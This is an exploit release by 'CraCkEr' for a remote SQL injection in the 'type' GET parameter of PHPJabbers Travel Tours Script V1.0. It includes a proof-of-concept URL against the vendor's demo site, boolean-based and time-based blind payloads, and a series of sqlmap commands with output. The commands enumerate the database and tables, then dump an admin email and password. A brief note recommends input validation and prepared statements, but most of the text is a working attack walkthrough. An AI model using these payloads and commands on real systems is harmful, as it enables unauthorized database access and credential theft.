┌┌────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr │ │ : │ Website : phpjabbers.com │ │ │ │ Vendor : PHPJABBERS │ │ Travel Tours Script │ │ Software : Travel Tours Script V1.0 │ │ │ │ Vuln Type: Remote SQL Injection │ │ A content management solution for │ │ Method : GET │ │ travel agencies and tour operators │ │ Critical : High [░░▒▒▓▓██] │ │ │ │ Impact : Database Access │ │ │ │ ─────────────────────────────────────┘ └────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The "High" rating is typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise. In this case the GET parameter 'type' is placed into a SQL query without │ │ validation; the remedy is to accept only the expected (apparently numeric) value and to bind │ │ it through a prepared statement rather than concatenating it into the query string.
│ │ │ ┌┌────────────────────────────────────────────────────────────────────────────┐ ┌┘ Exploit URL's ┌┘ └────────────────────────────────────────────────────────────────────────────┘┘ Live Demo Site: https://www.phpjabbers.com/travel-tours-script/#sectionDemo POC: https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1'[Injection] GET parameter 'type' is vulnerable --- Parameter: type (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND 8667=8667 AND (4844=4844 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND (SELECT 7164 FROM (SELECT(SLEEP(5)))loCg) AND (7206=7206 --- [+] Starting the Attack sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" --current-db --batch --random-agent --no-cast the back-end DBMS is MySQL web server operating system: Linux CentOS 6 web application technology: Apache 2.2.15 back-end DBMS: MySQL >= 5.0.12 [INFO] fetching current database current database: 'pjabbers_demo_vpl' sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl --tables --batch --random-agent --no-cast [INFO] fetching tables for database: 'pjabbers_demo_vpl' [INFO] fetching number of tables for database 'pjabbers_demo_vpl' [INFO] resumed: 52 +------------------------------------------+ | vacationpackages_comments | | vacationpackages_countries | | vacationpackages_enquiries | | vacationpackages_features | | vacationpackages_fields | | 
vacationpackages_listings_availabilities | | vacationpackages_listings_features | | vacationpackages_listings | | vacationpackages_multi_lang | | vacationpackages_notifications | | vacationpackages_options | | vacationpackages_payments | | vacationpackages_periods | | vacationpackages_plugin_country | | vacationpackages_plugin_galleries_set | | vacationpackages_plugin_gallery | | vacationpackages_plugin_locale_languages | | vacationpackages_plugin_locale | | vacationpackages_plugin_log_config | | vacationpackages_plugin_log | | vacationpackages_plugin_one_admin | | vacationpackages_plugin_paypal | | vacationpackages_prices | | vacationpackages_roles | | vacationpackages_types | | vacationpackages_users | | vacationpackages_comments | | vacationpackages_countries | | vacationpackages_enquiries | | vacationpackages_features | | vacationpackages_fields | | vacationpackages_listings | | vacationpackages_listings_availabilities | | vacationpackages_listings_features | | vacationpackages_multi_lang | | vacationpackages_notifications | | vacationpackages_options | | vacationpackages_payments | | vacationpackages_periods | | vacationpackages_plugin_country | | vacationpackages_plugin_galleries_set | | vacationpackages_plugin_gallery | | vacationpackages_plugin_locale | | vacationpackages_plugin_locale_languages | | vacationpackages_plugin_log | | vacationpackages_plugin_log_config | | vacationpackages_plugin_one_admin | | vacationpackages_plugin_paypal | | vacationpackages_prices | | vacationpackages_roles | | vacationpackages_types | | vacationpackages_users | +------------------------------------------+ sqlmap.py -u "https://demo.phpjabbers.com/1657905972_980/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl -T vacationpackages_users --columns --batch --random-agent --threads 5 --no-cast [INFO] fetching columns for table 'vacationpackages_users' in database 'pjabbers_demo_vpl' Database: 
pjabbers_demo_vpl Table: vacationpackages_users [16 columns] +----------------+--------------------------------------------------------+ | Column | Type | +----------------+--------------------------------------------------------+ | contact_fax | varchar(255) | | contact_mobile | varchar(255) | | contact_phone | varchar(255) | | contact_title | enum('mr','mrs','miss','ms','dr','prof','rev','other') | | contact_url | varchar(255) | | created | datetime | | email | varchar(255) | | id | int(10) unsigned | | ip | varchar(15) | | is_active | enum('T','F') | | last_login | datetime | | name | varchar(255) | | password | blob | | phone | varchar(255) | | role_id | int(10) unsigned | | status | enum('T','F') | +----------------+--------------------------------------------------------+ sqlmap.py -u "https://demo.phpjabbers.com/1657905972_980/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl -T vacationpackages_users -C email,password --dump --batch --random-agent --threads 5 --no-cast [INFO] fetching number of column(s) 'email,password' entries for table 'vacationpackages_users' in database 'pjabbers_demo_vpl' Database: pjabbers_demo_vpl Table: vacationpackages_users [1 entry] +-----------------+------------------------+ | email | password | +-----------------+------------------------+ |admin@admin.com | P@S13rd | +-----------------+------------------------+ [-] Done └─────────────────────────────────────────────────────────────────────────────┘ Greets: The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └────────────────────────────────────────────────────────────────────────────┘┘